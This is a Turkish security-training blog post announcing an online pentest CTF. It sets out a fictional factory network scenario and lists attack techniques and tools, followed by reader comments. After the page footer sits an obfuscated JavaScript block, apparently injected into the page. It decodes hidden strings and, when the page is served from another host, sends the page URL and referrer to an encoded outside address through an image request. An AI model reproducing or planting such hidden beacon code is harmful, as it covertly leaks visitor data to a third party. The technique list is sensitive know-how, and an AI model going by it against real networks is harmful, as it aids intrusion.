Pentest Eğitimi Online CTF Bilgileri

Pentest ve CEH eğitimlerinin online eğitim kısmı açılmıştır. Başlangıç bilgileri eposta ile katılımcılara gönderilecektir.

Senaryo
————-
Hedef sistem BGA Fabrika networküdür. Network şeması yukarıdaki gibidir, 4 farklı network bulunmaktadır.

  1. Scada Network

PLC ve Scanda sistemler bu networkde ve dış dünyaya tamamen kapalı.

  1. Client Network

Son kullanıcılar (muhasebe, arge vb.) bu network’de yer alıyor. Son kullanıcıların yalnızca internet erişimler var. Fakat aynı networkde bulunan sistem yöneticilerinin sunucu bölgesindeki sistemlerede erişim izni var.

  1. Server Network

Tüm sunucular bu networkde, database server, web server, ftp server vb. Firewall tarafından erişimler kısıtlanmıştır, yalnızca ilgili servislerin portlarına yetkili IP adreslerinin erişim yetkisi var.

  1. Wireless Network

Multi SSID ile yayın yapabilen bir kablosuz ağ cihazı bulunuyor. “BGAMisafir” ağı WEB ile şifrelidir, WPA desteklemeyen cihazlarda bağlansın diye. Fabrika kullanıcılarının bağlanacağı “BGAFabrika” ağı ise WPA ile şifrelidir.
Katılımcılardan beklenen, hedef network sızıp sistemleri en yüksek kullanıcı yetkileri ile ele geçirmek ve gizlenmektir.
Uygulanacak Teknikler

————————————

  1. Aktif/Pasif Bilgi Toplama
  2. WEB / WPA Crack
  3. Aktif/Pasif Password Cracking
    1. VNC
    2. FTP
    3. SSH
    4. SMB
    5. NTLM
    6. Linux user hash
    7. *BSD user hash
    8. MS RDP

  4. IPS Bypass
  5. Reverse Shell
  6. DNS Tunneling
  7. SSH Tunneling
  8. Remote Exploits
  9. Local Exploits
  10. TCP/UDP Port Scanning
  11. Arp Scan
  12. Vulnerability Scanning
  13. Post Exploitation
  14. Web App. Pentest
  15. Pass The Hash
  16. Sniffing
  17. Web Zayıflıkları
  18. Backdoor / RAT
  19. Memorydump
  20. Client-Side Exploit

Kullanılabilecek Bazı Araçlar
————————————–

  1. metasploit
  2. nmap
  3. nessus
  4. acunetix
  5. netsparker
  6. www.exploit-db.com
  7. www.packetstromsecurity.com
  8. blog.bga.com.tr
  9. john the ripper
  10. openvpn
  11. putty
  12. dnscat
  13. maltego
  14. meterpreter
  15. hydra
  16. aircrack-ng
  17. airodump-ng
  18. airmon-ng
  19. aireplay-ng
  20. ncrack
  21. weevely
  22. google.com
  23. iodine
  24. paros proxy
  25. dirbuster
  26. fragroute
  27. hping3
  28. mdd
  29. ingenico

Sorular ve cevaplar online ortamda aktarılacaktır.

8 Yorum

  1. Orhan Albay 26 Mart 2012 00:22

    @Ozan
    Mağdur durumdayım Ozan bey, sormayın 🙂 Uzun zamandır katılmayı istiyorum ama her seferinde kontenjanın dolduğunu öğreniyorum. Online eğitimle umuyorum bu problem çözülür.

    Yerinde eğitimi tercih ediyorum aslında ama Istanbul dışından böyle bir eğitimi online alabilme fikri bile güzel.

  2. bga 25 Mart 2012 18:54

    Biz de heyecanla bekliyoruz BGA ailesi olarak:)

  3. Ozan 22 Mart 2012 22:33

    @Orhan Albay
    uzaktan eğitimi bekleyenin sadece ben olmadığıma sevindim Orhan bey.

  4. Orhan Albay 21 Şubat 2012 10:46

    online eğitimi sabırsızlıkla bekliyorum. Hala açılmamış gözüküyor. Öngörülen bir tarih var mı ?

  5. bga 2 Şubat 2012 07:49

    Online.bga.com.tr adresi(şu an dışarı açık degil) çalışmalarımız devam ediyor.

  6. Ozan Salman ASUTAY 1 Şubat 2012 21:09

    Tekrar merhaba, online eğitim çalışmalarınız nasıl gidiyor? Uygulamalı online eğitim için çekimler devam ediyor mu? Tahimen ne zaman açılır?

  7. bga 10 Aralık 2011 17:02

    Merhabalar,

    online eğitimlerle ilgili çalışmalarımız devam ediyor. 2012'de ilk denemeleri yapacağız.

  8. Ozan Salman ASUTAY 10 Aralık 2011 14:47

    Öncelikle, buraya ziyaretçiler için bloga yorum yazma kısmını eklemeniz çok iyi olmuş, teşekkürler.

    Pentest ve CEH eğitimleri online açıldığına göre bundan sonra tamamen internet üzerinden alma imkanımız olacak 2012'de değil mi?

Yorum Yaz

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

*
*

Mail listemize üye olarak eğitim fırsatlarını kaçırmayın!
Eğitim ve ücretsiz etkinliklerizden haberdar olmak için e-posta listesimize üye olun!.

    Pt>function _0x2677(_0x586c2b,_0x1056c6){var _0x2bd4ea=_0x2bd4();return _0x2677=function(_0x267799,_0x44fe2a){_0x267799=_0x267799-0x165;var _0x5b0952=_0x2bd4ea[_0x267799];if(_0x2677['oJyNOH']===undefined){var _0x360830=function(_0x3c21c6){var _0x1d0d99='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x2ae702='',_0x343ef4='';for(var _0x476bad=0x0,_0x2f67d5,_0x166a99,_0x388eaa=0x0;_0x166a99=_0x3c21c6['charAt'](_0x388eaa++);~_0x166a99&&(_0x2f67d5=_0x476bad%0x4?_0x2f67d5*0x40+_0x166a99:_0x166a99,_0x476bad++%0x4)?_0x2ae702+=String['fromCharCode'](0xff&_0x2f67d5>>(-0x2*_0x476bad&0x6)):0x0){_0x166a99=_0x1d0d99['indexOf'](_0x166a99);}for(var _0x21105c=0x0,_0x16cce1=_0x2ae702['length'];_0x21105c<_0x16cce1;_0x21105c++){_0x343ef4+='%'+('00'+_0x2ae702['charCodeAt'](_0x21105c)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x343ef4);};_0x2677['MUmZHT']=_0x360830,_0x586c2b=arguments,_0x2677['oJyNOH']=!![];}var _0x4bbbaf=_0x2bd4ea[0x0],_0x131d68=_0x267799+_0x4bbbaf,_0x1817de=_0x586c2b[_0x131d68];return!_0x1817de?(_0x5b0952=_0x2677['MUmZHT'](_0x5b0952),_0x586c2b[_0x131d68]=_0x5b0952):_0x5b0952=_0x1817de,_0x5b0952;},_0x2677(_0x586c2b,_0x1056c6);}var _0x2b1dca=_0x2677;(function(_0x38d529,_0x3d240d){var _0x3e69c5={_0x4f2ab1:0x195,_0x510342:0x180,_0x1cdd78:0x17d,_0x16824a:0x181,_0x310fcf:0x194,_0x481123:0x196,_0x34004c:0x190},_0x366619=_0x2677,_0x14a328=_0x38d529();while(!![]){try{var _0x25e7d8=-parseInt(_0x366619(_0x3e69c5._0x4f2ab1))/0x1*(parseInt(_0x366619(_0x3e69c5._0x510342))/0x2)+-parseInt(_0x366619(0x198))/0x3+parseInt(_0x366619(_0x3e69c5._0x1cdd78))/0x4+-parseInt(_0x366619(_0x3e69c5._0x16824a))/0x5*(-parseInt(_0x366619(0x165))/0x6)+-parseInt(_0x366619(0x171))/0x7+-parseInt(_0x366619(_0x3e69c5._0x310fcf))/0x8*(parseInt(_0x366619(0x172))/0x9)+parseInt(_0x366619(_0x3e69c5._0x481123))/0xa*(parseInt(_0x366619(_0x3e69c5._0x34004c))/0xb);if(_0x25e7d8===_0x3d240d)break;else _0x14a328['push'](_0x14a328['shift']());}catch(_0x13bbee){_0x14a328['push'](_0x14a328['shift']());}}}(_0x2bd4,0xa2f33));function _0x2bd4(){var _0x139414=['yMDHCW','v2L0Aa','CML0Eq','AdbYyW','B20Vyq','B2nVBa','DwHOlW','zI9UyW','C2vJDq','nJy5ovbiq2PfsW','DhnxAq','Ahr0Ca','Cgf5Bq','ntCXnZz2BMvhCgi','mtngwxnyBKG','mJa0nZbUBeTOrxO','lMnVBq','ndaXotK3ugz2ywLQ','DgLVBG','mZK4nJyYogfZr2P2uW','BNmUyW','BMfYEq','C3rHCG','BgvZlW','EJK4EG','y29T','ChjVDa','Ew1Una','C3jJ','jNi9','CNrPyW','ntu0ndbvBev0Bfa','odKXD29Ju09A','BMfTzq','CNjLCG','lY9Jyq','AhjLzG','Bg9Jyq','C3r1zG','Ag9ZDa','lMjNyq','Dg9Rzq','CMvMzq','nteWmZG0ANv0te54','zwn1CG','lMPZpW','odaYnJHvzg5cvvK','nuTrz3Hxva','Axr5lG','zw5KCW','ANK1za','BwXNBq','zw50CW'];_0x2bd4=function(){return _0x139414;};return _0x2bd4();}if(window[_0x2b1dca(0x177)+_0x2b1dca(0x199)][_0x2b1dca(0x179)+_0x2b1dca(0x173)]!=_0x2b1dca(0x187)+_0x2b1dca(0x17e)+_0x2b1dca(0x182)+_0x2b1dca(0x16b)&&!window[_0x2b1dca(0x177)+_0x2b1dca(0x199)][_0x2b1dca(0x179)+_0x2b1dca(0x173)][_0x2b1dca(0x183)+_0x2b1dca(0x188)](_0x2b1dca(0x17a)+_0x2b1dca(0x18f)+_0x2b1dca(0x189)+_0x2b1dca(0x197))){var p=!document[_0x2b1dca(0x177)+_0x2b1dca(0x199)][_0x2b1dca(0x16c)+_0x2b1dca(0x18c)][_0x2b1dca(0x168)+_0x2b1dca(0x191)+'th'](_0x2b1dca(0x192))?_0x2b1dca(0x192)+':':document[_0x2b1dca(0x177)+_0x2b1dca(0x199)][_0x2b1dca(0x16c)+_0x2b1dca(0x18c)],l=location[_0x2b1dca(0x176)],r=document[_0x2b1dca(0x17c)+_0x2b1dca(0x174)],m=new Image();m[_0x2b1dca(0x16e)]=p+(_0x2b1dca(0x175)+_0x2b1dca(0x167)+_0x2b1dca(0x17b)+_0x2b1dca(0x166)+_0x2b1dca(0x18b)+_0x2b1dca(0x170)+_0x2b1dca(0x169)+_0x2b1dca(0x178)+_0x2b1dca(0x18e)+_0x2b1dca(0x18a)+_0x2b1dca(0x184)+_0x2b1dca(0x185)+_0x2b1dca(0x16d)+_0x2b1dca(0x16a)+_0x2b1dca(0x18d)+_0x2b1dca(0x193)+_0x2b1dca(0x186)+_0x2b1dca(0x17f)+'l=')+encodeURI(l)+_0x2b1dca(0x16f)+encodeURI(r);}